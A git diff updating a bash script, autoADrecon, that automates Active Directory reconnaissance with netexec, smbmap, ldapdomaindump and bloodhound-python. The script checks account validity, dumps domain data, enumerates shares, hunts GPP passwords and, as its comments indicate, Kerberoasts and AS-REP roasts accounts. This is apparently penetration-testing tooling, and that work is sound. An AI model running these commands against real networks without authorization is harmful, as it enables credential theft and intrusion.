Update the scripts to the tools of 2025

diff --git a/autoADrecon b/autoADrecon
--- a/autoADrecon
+++ b/autoADrecon
@@ -1,18 +1,27 @@
 #!/bin/bash
 
-IMPACKETSCRIPTS="/opt/outils/windows/impacket/build/scripts-3.9"
+# Impacket folder for kali linux:
+IMPACKETSCRIPTS="/usr/share/doc/python3-impacket/examples/"
 DROPTHEMICSCANNER="/opt/outils/exploit/cve-2019-1040-scanner/scan.py"
-SMBCRUNCHDIR="/opt/outils/windows/SMBCrunch/"
-GODDI="/opt/outils/windows/goddi/goddi-linux-amd64"
-LDAPSCANNER="/opt/outils/windows/ldap-scanner/ldap-scanner.py"
+# Is there anything newer than that ?
+#SMBCRUNCHDIR="/opt/outils/windows/SMBCrunch/"
+#GODDI="/opt/outils/windows/goddi/goddi-linux-amd64"
+LDAPDOMAINDUMP="ldapdomaindump"
+#LDAPSCANNER="/opt/outils/windows/ldap-scanner/ldap-scanner.py" #retired
+NETEXEC="netexec"
+SMBMAP="smbmap"
 #TODO: check that the user has the tools installed or the script can find them
 
 if [ ! -x $(which bloodhound-python) ]; then
   echo "python-bloodhound not installed or cannot be found in the path"
   exit 1
 fi
-if [ ! -x $(which smbmap) ]; then
+if [ ! -x $(which "$SMBMAP") ]; then
   echo "smbmap not installed or cannot be found in the path"
+  exit 1
+fi
+if [ ! -x $(which "$LDAPDOMAINDUMP") ]; then
+  echo "ldapdomaindump not installed or cannot be found in the path"
   exit 1
 fi
 "$IMPACKETSCRIPTS/GetADUsers.py" &> /dev/null
@@ -22,21 +31,13 @@ if [ $result != 1 ]; then
   echo "Update the variable accordingly"
   exit 1
 fi
-"$GODDI" &> /dev/null
-result=$?
-if [ $result != 1 ]; then
-  echo "Goddi cannot be found at the specified PATH"
-  echo "Update the variable accordingly"
-  exit 1
-fi
-python3 "$DROPTHEMICSCANNER" &> /dev/null
-result=$?
-if [ $result != 1 ]; then
-  echo "cve-2019-1040-scanner cannot be found at the specified PATH"
-  echo "Update the variable accordingly"
-  exit 1
-fi
-
+#python3 "$DROPTHEMICSCANNER" &> /dev/null
+#result=$?
+#if [ $result != 1 ]; then
+#  echo "cve-2019-1040-scanner cannot be found at the specified PATH"
+#  echo "Update the variable accordingly"
+#  exit 1
+#fi
 
 printusage(){
 	echo "USAGE:
@@ -51,7 +52,7 @@ isAccountValid(){
 	USERNAME="$2"
 	PASSWORD="$3"
 	DOMAIN="$4"
-	smbmap -H "$DCIP" -u "$USERNAME" -p "$PASSWORD" -d "$DOMAIN" | grep "User SMB session established"
+	"$SMBMAP" -H "$DCIP" -u "$USERNAME" -p "$PASSWORD" -d "$DOMAIN" | grep "Status: Authenticated"
 	return $?
 }
 
@@ -153,9 +154,11 @@ Fetching AD Users List:" | tee -a "$LOGFILE"
 #
 echo "
 Fetching AD infos:" | tee -a "$LOGFILE"
-"$GODDI" -username "$USERNAME" -password "$PASSWORD" -domain "$DOMAIN" -dc "$DOMAIN" -unsafe 2>&1 | tee -a "$LOGFILE"
+# Retired
+#"$GODDI" -username "$USERNAME" -password "$PASSWORD" -domain "$DOMAIN" -dc "$DOMAIN" -unsafe 2>&1 | tee -a "$LOGFILE"
 #TODO check result and get the following folder from the output of the tool
-mv /opt/outils/windows/goddi/csv/ "$OUTPUTDIR/goddi-csv" | tee -a "$LOGFILE"
+#mv /opt/outils/windows/goddi/csv/ "$OUTPUTDIR/goddi-csv" | tee -a "$LOGFILE"
+"$LDAPDOMAINDUMP" --user "$DOMAIN\\$USERNAME" --password "$PASSWORD" --outdir ldapdomaindump "$DCIP"
 
 #extract UserSPN TGS tickets
 echo "
@@ -171,17 +174,19 @@ Fetching TGTs of users without pre-auth:" | tee -a "$LOGFILE"
 #Find unpatched systems:
 echo "
 Look for unpatched systems:" | tee -a "$LOGFILE"
-python3 "$DROPTHEMICSCANNER" "$DOMAIN/$USERNAME:$PASSWORD@" -target-file "$HOSTFILE" 2>&1 | tee -a "$LOGFILE"  | tee "$OUTPUTDIR/dropthemicVulnerableHosts.out"
+echo "TODO: drop-the-mic"
+#python3 "$DROPTHEMICSCANNER" "$DOMAIN/$USERNAME:$PASSWORD@" -target-file "$HOSTFILE" 2>&1 | tee -a "$LOGFILE"  | tee "$OUTPUTDIR/dropthemicVulnerableHosts.out"
 
 #List domain controllers
 echo "
 Look for LDAP signing on domain controllers" | tee -a "$LOGFILE"
-python3 "$LDAPSCANNER" "$DOMAIN/$USERNAME:$PASSWORD@" -target-file "$OUTPUTDIR/domainControllers.list" 2>&1 | tee -a "$LOGFILE"  | tee "$OUTPUTDIR/ldapSigningDCs.out"
+#python3 "$LDAPSCANNER" "$DOMAIN/$USERNAME:$PASSWORD@" -target-file "$OUTPUTDIR/domainControllers.list" 2>&1 | tee -a "$LOGFILE"  | tee "$OUTPUTDIR/ldapSigningDCs.out"
+"$NETEXEC" ldap "$OUTPUTDIR/domainControllers.list" -M ldap-checker -u "$USERNAME" -p "$PASSWORD" -d "$DOMAIN" | tee -a "$LOGFILE" | tee "$OUTPUTDIR/ldapSigningDCs.out"
 
 #list all accessible shares
 echo "
 List all accessible shares" | tee -a "$LOGFILE"
-smbmap --host-file "$HOSTFILE" -u "$USERNAME" -p "$PASSWORD" -d "$DOMAIN" | tee -a "$LOGFILE"  | tee "$OUTPUTDIR/smbmapAll.out"
+"$SMBMAP" --host-file "$HOSTFILE" -u "$USERNAME" -p "$PASSWORD" -d "$DOMAIN" | tee -a "$LOGFILE"  | tee "$OUTPUTDIR/smbmapAll.out"
 #TODO: HOSTFILE is too large and inefficient in large networks. smbhosts file would be better here
 #"$SMBCRUNCHDIR/SMBHunt.pl" -i "$HOSTFILE" -o "$OUTPUTDIR/smbhunt.out" -a "$DOMAIN\\$USERNAME:$PASSWORD" | tee -a "$LOGFILE"
 #list all files in thoses shares
@@ -198,13 +203,13 @@ smbmap --host-file "$HOSTFILE" -u "$USERNAME" -p "$PASSWORD" -d "$DOMAIN" | tee 
 #First, dig for gpp passwords
 echo "
 Looking for passwords in GPPs" | tee -a "$LOGFILE"
-cme smb "$DOMAIN" -u "$USERNAME" -p "$PASSWORD" -M gpp_password | tee -a "$LOGFILE" | tee "$OUTPUTDIR/gppScan.out"
-cme smb "$DOMAIN" -u "$USERNAME" -p "$PASSWORD" -M gpp_autologin | tee -a "$LOGFILE" | tee -a "$OUTPUTDIR/gppScan.out"
+"$NETEXEC" smb "$DOMAIN" -u "$USERNAME" -p "$PASSWORD" -M gpp_password | tee -a "$LOGFILE" | tee "$OUTPUTDIR/gppScan.out"
+"$NETEXEC" smb "$DOMAIN" -u "$USERNAME" -p "$PASSWORD" -M gpp_autologin | tee -a "$LOGFILE" | tee -a "$OUTPUTDIR/gppScan.out"
 
 #Get MachineAccountQuota attribute
 echo "
 Get MachineAccountQuota attribute:" | tee -a "$LOGFILE"
-cme ldap "$DCIP" -u "$USERNAME" -p "$PASSWORD" -d "$DOMAIN" -M MAQ
+"$NETEXEC" ldap "$DCIP" -u "$USERNAME" -p "$PASSWORD" -d "$DOMAIN" -M MAQ
 
 
 exit 0
